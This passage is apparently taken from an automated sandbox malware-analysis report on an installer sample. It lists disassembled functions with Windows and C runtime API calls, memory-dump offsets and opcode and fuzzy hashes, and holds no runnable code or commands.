                • Instruction Fuzzy Hash: EE112672504240CFCB06DF10D9C4B56BF72FB94310F28C5A9DD480B616C336D45ACBA1
                Memory Dump Source
                • Source File: 00000000.00000002.4498018309.00000000033BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_33bd000_33-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 12ad8e29f2145ea390d9c3e6f8588002f567143d196c15614f7ce9e777a9d842
                • Instruction ID: 4c4684489d850f526e2c0bda06d6c9f51e9b9c70707734a3da0e2bd1ceaa1aa9
                • Opcode Fuzzy Hash: 12ad8e29f2145ea390d9c3e6f8588002f567143d196c15614f7ce9e777a9d842
                • Instruction Fuzzy Hash: 0701297140D3809FD7128B258D94692BFB8EF53224F1984DBE9888F5A7C2795849CB72
                Memory Dump Source
                • Source File: 00000000.00000002.4498018309.00000000033BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_33bd000_33-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 72dc3392c568ef416c44465970db70ba6570beb281da2af7f872be6eb1690ea1
                • Instruction ID: 83aab683ff49cdae78635a04a1bb877cb716e400a7ac19bf2a2a9bfc3e6b6085
                • Opcode Fuzzy Hash: 72dc3392c568ef416c44465970db70ba6570beb281da2af7f872be6eb1690ea1
                • Instruction Fuzzy Hash: A9018F714093449AE710CE29DDC4BA7BFA8EF41364F1CC45AEE484AA46C27D9845CAB1
                APIs
                • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,00DCFB0A,?,00DC6AFC,?,000000BC,?,00000001,00000000,00000000), ref: 00DCF50C
                • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,00DCFB0A,?,00DC6AFC,?,000000BC,?,00000001,00000000,00000000), ref: 00DCF535
                • GetACP.KERNEL32(?,?,00DCFB0A,?,00DC6AFC,?,000000BC,?,00000001,00000000), ref: 00DCF549
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: InfoLocale
                • String ID: ACP$OCP
                • API String ID: 2299586839-711371036
                • Opcode ID: f3916ac2f39d770c78f695ba5d952997bf742e647bd4f413b72f8287d5250c29
                • Instruction ID: b9f194c9fb5d99c240f469ffdbd2c4d0c745890342ce385770a92ed56a2234f2
                • Opcode Fuzzy Hash: f3916ac2f39d770c78f695ba5d952997bf742e647bd4f413b72f8287d5250c29
                • Instruction Fuzzy Hash: 4901B131601307BAEB119F60EC06F9E77AAAB01359F24442AE201E21C0DB60DA419674
                APIs
                • IsDebuggerPresent.KERNEL32 ref: 00DCE003
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00DCE018
                • UnhandledExceptionFilter.KERNEL32(00DDAEF0), ref: 00DCE023
                • GetCurrentProcess.KERNEL32(C0000409), ref: 00DCE03F
                • TerminateProcess.KERNEL32(00000000), ref: 00DCE046
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                • String ID:
                • API String ID: 2579439406-0
                • Opcode ID: 8b26f3516938a483f985cfc5c978c1ce543af6583faced1d821d81579c418d73
                • Instruction ID: edf1ba75f8305789f4495681b63a8d5ce6674e7854113c191bd054de3e4f598e
                • Opcode Fuzzy Hash: 8b26f3516938a483f985cfc5c978c1ce543af6583faced1d821d81579c418d73
                • Instruction Fuzzy Hash: 3921BCB8A023849FC700EF99ECD5A987BF4FB48744F50405AE509CBBA0E7B159808F35
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4498846255.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_5830000_33-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID: Xaq$$]q
                • API String ID: 0-1280934391
                • Opcode ID: ea6ce4924d2b4604d877a151d2372361d27de1525d51e32d0ce859977574b1e6
                • Instruction ID: 8995cddad947a1c26b8c3db8b51119e0e8a3d80de937f3691fa478dc343ff032
                • Opcode Fuzzy Hash: ea6ce4924d2b4604d877a151d2372361d27de1525d51e32d0ce859977574b1e6
                • Instruction Fuzzy Hash: BC815E74B05218DBDB08EF79986967E7BB7BBC8710B04C429E44BE7384DE389C029791
                APIs
                • SetUnhandledExceptionFilter.KERNEL32(Function_0000C74B), ref: 00DCC792
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: ea191670ea6559c4af7a955370d7b6f281fcde8502b48fea0206ad9e2cc9834f
                • Instruction ID: c14af3185c7015f795ab76e0d5c259fb9ad678ca4385ecaa9044493f990b82fb
                • Opcode Fuzzy Hash: ea191670ea6559c4af7a955370d7b6f281fcde8502b48fea0206ad9e2cc9834f
                • Instruction Fuzzy Hash: 8D9002F02626014A470157746D1AE1577919A586067421455B205C5194DB9155045D72
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4498846255.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_5830000_33-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID: \Vl
                • API String ID: 0-682378881
                • Opcode ID: 22e08ce928f8ff31685d151780e7433782d826cfe9542fed3293592a2892dd0d
                • Instruction ID: b3c2035989d2b026db53807edd7cde78a338f9f799c868182acfcb4dd5e464a9
                • Opcode Fuzzy Hash: 22e08ce928f8ff31685d151780e7433782d826cfe9542fed3293592a2892dd0d
                • Instruction Fuzzy Hash: 87914E70E04209DFDF14CFA9C98A79DBBF2BF88314F148529D815E7264EB749846CB85
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                • Instruction ID: ae83d06cb1769334372a119ab4cd26fe35fc509fd896027b9c698f5fbd264d6a
                • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                • Instruction Fuzzy Hash: 6AC17C73D1A5F2498B36462E041833EEE626EC1B8572FC396DCD43F689C227AD0596E0
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                • Instruction ID: a52f954abf46b94ee5c4f682eb050a026e16ff681f84c346544f95b800650901
                • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                • Instruction Fuzzy Hash: 6EC16C73D0A5F2498B36462D441873BEEA26ED1B8471FC396DCD43F299C227AD0596E0
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                • Instruction ID: 5fd386dc11ac83dfff7ce517159442fb712d77d9bcecfbdcb2cfceb85337ad89
                • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                • Instruction Fuzzy Hash: 96C16E73D0A5F24A8B36452D041873FEE616EC1B8471F83A6DCD43F789C627AD1596E0
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                • Instruction ID: 25626b3fcd7ce29bf9ee285331647446c58569704ca857cadca67549cc7bdc3f
                • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                • Instruction Fuzzy Hash: 57B19E33D0A5F24A8B36852E041873FEE626ED1B8471EC396CCD43F789C227AD0596E0
                Memory Dump Source
                • Source File: 00000000.00000002.4497904003.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3360000_33-o_Installer.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
                • Instruction ID: 1766451990c754ea29cbd3cc4d598b7b92dda13a1c3153b1330bcc05252111da
                • Opcode Fuzzy Hash: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
                • Instruction Fuzzy Hash: 14F06D32610204AFDF25CF48CC81EAA77EDEF08220B0840A9FD09DB221E335FD209B80
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e9b762c1d9091a2c99a71b58989111832db4a596a20ce5d8aa31cc9ae1b6fce7
                • Instruction ID: b7981b2b79c9869a23804c67e8d6833124cc0914444bbad9644d1b21342d72dc
                • Opcode Fuzzy Hash: e9b762c1d9091a2c99a71b58989111832db4a596a20ce5d8aa31cc9ae1b6fce7
                • Instruction Fuzzy Hash: 71C012B1C04318AB8F04EFED544109DBBF8AA04200B40C5AA9405B2242D27052104644
                APIs
                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00DC5A5E), ref: 00DC98ED
                • __mtterm.LIBCMT ref: 00DC98F9
                  • Part of subcall function 00DC9632: DecodePointer.KERNEL32(00000002,00DC9A5B,?,00DC5A5E), ref: 00DC9643
                  • Part of subcall function 00DC9632: TlsFree.KERNEL32(00000002,00DC9A5B,?,00DC5A5E), ref: 00DC965D
                  • Part of subcall function 00DC9632: DeleteCriticalSection.KERNEL32(00000000,00000000,76EE5810,?,00DC9A5B,?,00DC5A5E), ref: 00DCB6A4
                  • Part of subcall function 00DC9632: _free.LIBCMT ref: 00DCB6A7
                  • Part of subcall function 00DC9632: DeleteCriticalSection.KERNEL32(00000002,76EE5810,?,00DC9A5B,?,00DC5A5E), ref: 00DCB6CE
                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00DC990F
                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00DC991C
                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00DC9929
                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00DC9936
                • TlsAlloc.KERNEL32(?,00DC5A5E), ref: 00DC9986
                • TlsSetValue.KERNEL32(00000000,?,00DC5A5E), ref: 00DC99A1
                • __init_pointers.LIBCMT ref: 00DC99AB
                • EncodePointer.KERNEL32(?,00DC5A5E), ref: 00DC99BC
                • EncodePointer.KERNEL32(?,00DC5A5E), ref: 00DC99C9
                • EncodePointer.KERNEL32(?,00DC5A5E), ref: 00DC99D6
                • EncodePointer.KERNEL32(?,00DC5A5E), ref: 00DC99E3
                • DecodePointer.KERNEL32(00DC97B6,?,00DC5A5E), ref: 00DC9A04
                • __calloc_crt.LIBCMT ref: 00DC9A19
                • DecodePointer.KERNEL32(00000000,?,00DC5A5E), ref: 00DC9A33
                • GetCurrentThreadId.KERNEL32 ref: 00DC9A45
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                • API String ID: 3698121176-3819984048
                • Opcode ID: 3367df96e6653f9868146943807f7569567a749666d97e193a8bf39901cfc656
                • Instruction ID: 5e2d4d04250bc1595002d8b4960bb9982ecdd567f434721dfdd6b64c84078e00
                • Opcode Fuzzy Hash: 3367df96e6653f9868146943807f7569567a749666d97e193a8bf39901cfc656
                • Instruction Fuzzy Hash: DA3151319423929ED720AF75AC59B6DBFE4E744360B0C451BE514DB3B2DBB58881CE70
                APIs
                • __EH_prolog.LIBCMT ref: 00DC2364
                • std::_Lockit::_Lockit.LIBCPMT ref: 00DC2373
                • int.LIBCPMT ref: 00DC238A
                  • Part of subcall function 00DC1035: std::_Lockit::_Lockit.LIBCPMT ref: 00DC1046
                • std::bad_exception::bad_exception.LIBCMT ref: 00DC23C1
                • __CxxThrowException@8.LIBCMT ref: 00DC23CF
                • std::locale::facet::_Incref.LIBCPMT ref: 00DC23DF
                • std::locale::facet::_Facet_Register.LIBCPMT ref: 00DC23E5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prologIncrefRegisterThrowstd::bad_exception::bad_exception
                • String ID: bad cast
                • API String ID: 878426289-3145022300
                • Opcode ID: d1170b606a05de839b743fe8938b3eebdf59fc74b741de793f198c103bcbff02
                • Instruction ID: d3ebaca1bdedbdc48e864126936932b8f0615d04c6fe360839a74fb6c1f7a5ae
                • Opcode Fuzzy Hash: d1170b606a05de839b743fe8938b3eebdf59fc74b741de793f198c103bcbff02
                • Instruction Fuzzy Hash: 3B115A36900266ABCB05FBA4CC92FAEB735EB81720F64011EF411A72D1DF749A45CBB0
                APIs
                • __EH_prolog.LIBCMT ref: 00DC1E33
                • std::_Lockit::_Lockit.LIBCPMT ref: 00DC1E42
                • int.LIBCPMT ref: 00DC1E59
                  • Part of subcall function 00DC1035: std::_Lockit::_Lockit.LIBCPMT ref: 00DC1046
                • std::bad_exception::bad_exception.LIBCMT ref: 00DC1E90
                • __CxxThrowException@8.LIBCMT ref: 00DC1E9E
                • std::locale::facet::_Incref.LIBCPMT ref: 00DC1EAE
                • std::locale::facet::_Facet_Register.LIBCPMT ref: 00DC1EB4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prologIncrefRegisterThrowstd::bad_exception::bad_exception
                • String ID: bad cast
                • API String ID: 878426289-3145022300
                • Opcode ID: e9834e1309f3e8bd50e8f359d67aa5b22eef0a461544a0d8b0ac24d74d97092a
                • Instruction ID: 074e634e7d5d555567c53836327b3ee0cc0e4a0add0ec33356c12a6dbd57ae41
                • Opcode Fuzzy Hash: e9834e1309f3e8bd50e8f359d67aa5b22eef0a461544a0d8b0ac24d74d97092a
                • Instruction Fuzzy Hash: A11177769002669BCF05FB64C952FAEB735EB91720F14421DF411A72D2DF749A05CB70
                APIs
                • __getptd_noexit.LIBCMT ref: 00DC741A
                  • Part of subcall function 00DC9723: GetLastError.KERNEL32(?,?,00DCA964,00DC4478,?,?,00DC3C7B,?,?,00DC101C), ref: 00DC9727
                  • Part of subcall function 00DC9723: ___set_flsgetvalue.LIBCMT ref: 00DC9735
                  • Part of subcall function 00DC9723: __calloc_crt.LIBCMT ref: 00DC9749
                  • Part of subcall function 00DC9723: DecodePointer.KERNEL32(00000000,?,?,00DCA964,00DC4478,?,?,00DC3C7B,?,?,00DC101C), ref: 00DC9763
                  • Part of subcall function 00DC9723: GetCurrentThreadId.KERNEL32 ref: 00DC9779
                  • Part of subcall function 00DC9723: SetLastError.KERNEL32(00000000,?,?,00DCA964,00DC4478,?,?,00DC3C7B,?,?,00DC101C), ref: 00DC9791
                • __calloc_crt.LIBCMT ref: 00DC743C
                • __get_sys_err_msg.LIBCMT ref: 00DC745A
                • _strcpy_s.LIBCMT ref: 00DC7462
                • __invoke_watson.LIBCMT ref: 00DC7477
                Strings
                • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00DC7427, 00DC744A
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
                • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                • API String ID: 3117964792-798102604
                • Opcode ID: 19ed468da0a390d6258f8ecefc4a5a65ba0caad2bf180f650c5ea3f365b6c153
                • Instruction ID: 628bc331d46143a191e749dc42b0451032d3c6d59c2655491236a7008696fd32
                • Opcode Fuzzy Hash: 19ed468da0a390d6258f8ecefc4a5a65ba0caad2bf180f650c5ea3f365b6c153
                • Instruction Fuzzy Hash: 20F09E7260C21327D7253A3E9C81F6BBA9CCF40B28B18047FF659D7602E921DC009AB5
                APIs
                • __EH_prolog.LIBCMT ref: 00DC1A86
                • std::_Lockit::_Lockit.LIBCPMT ref: 00DC1A98
                • std::exception::exception.LIBCMT ref: 00DC1ACF
                  • Part of subcall function 00DC3C86: std::exception::_Copy_str.LIBCMT ref: 00DC3CA1
                • __CxxThrowException@8.LIBCMT ref: 00DC1AE4
                  • Part of subcall function 00DC450C: RaiseException.KERNEL32(?,?,00DC13AC,?,?,?,?,?,00DC13AC,?,00DDCCE8,00000000), ref: 00DC454E
                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00DC1AED
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: std::_$Copy_strExceptionException@8H_prologLocinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
                • String ID: bad locale name
                • API String ID: 446407826-1405518554
                • Opcode ID: e7245f62602ed3904dfe9d56c7f5fd72ed29efcc02cf83bc3638557aa8c572e3
                • Instruction ID: e6ecf9bc53089d7f161c76037c811eb0a3584a1a72db26d7842d57699be72eac
                • Opcode Fuzzy Hash: e7245f62602ed3904dfe9d56c7f5fd72ed29efcc02cf83bc3638557aa8c572e3
                • Instruction Fuzzy Hash: EE015BB6801745AECB21EF99C4809CEFFB4FB19300B40852FE55993601C7709708CBB5
                APIs
                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00DDD638,00000008,00DC9777,00000000,00000000,?,?,00DCA964,00DC4478,?,?,00DC3C7B,?,?,00DC101C), ref: 00DC9680
                • __lock.LIBCMT ref: 00DC96B4
                  • Part of subcall function 00DCB7B7: __mtinitlocknum.LIBCMT ref: 00DCB7CD
                  • Part of subcall function 00DCB7B7: __amsg_exit.LIBCMT ref: 00DCB7D9
                  • Part of subcall function 00DCB7B7: EnterCriticalSection.KERNEL32(00000000,00000000,?,00DC96B9,0000000D), ref: 00DCB7E1
                • InterlockedIncrement.KERNEL32(?), ref: 00DC96C1
                • __lock.LIBCMT ref: 00DC96D5
                • ___addlocaleref.LIBCMT ref: 00DC96F3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                • String ID: KERNEL32.DLL
                • API String ID: 637971194-2576044830
                • Opcode ID: 7677829fa202dc726997b94ac1090f3bd272ce568fd6ac0cf0278084b70df61f
                • Instruction ID: 7d05706f781b3600a40de60f2b5ebfd1696b52774c4143a10b21a527f2571b44
                • Opcode Fuzzy Hash: 7677829fa202dc726997b94ac1090f3bd272ce568fd6ac0cf0278084b70df61f
                • Instruction Fuzzy Hash: A5015E71441B059FD7209F69D846B49FBE0EF50324F10850EE89A973E1CBB4A544CF35
                APIs
                • __getptd.LIBCMT ref: 00DC76F1
                  • Part of subcall function 00DC979C: __getptd_noexit.LIBCMT ref: 00DC979F
                  • Part of subcall function 00DC979C: __amsg_exit.LIBCMT ref: 00DC97AC
                • __getptd.LIBCMT ref: 00DC7702
                • __getptd.LIBCMT ref: 00DC7710
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: __getptd$__amsg_exit__getptd_noexit
                • String ID: MOC$RCC$csm
                • API String ID: 803148776-2671469338
                • Opcode ID: 1fefd8f84a83a40e8ccdaf602bb71a21e828e3d03397e904957b1e236622b6d8
                • Instruction ID: 5d0dfbe1fb17fd3a45b3bf8c3502725c0243ae23c2ebdd8c13cfa907a6531dd3
                • Opcode Fuzzy Hash: 1fefd8f84a83a40e8ccdaf602bb71a21e828e3d03397e904957b1e236622b6d8
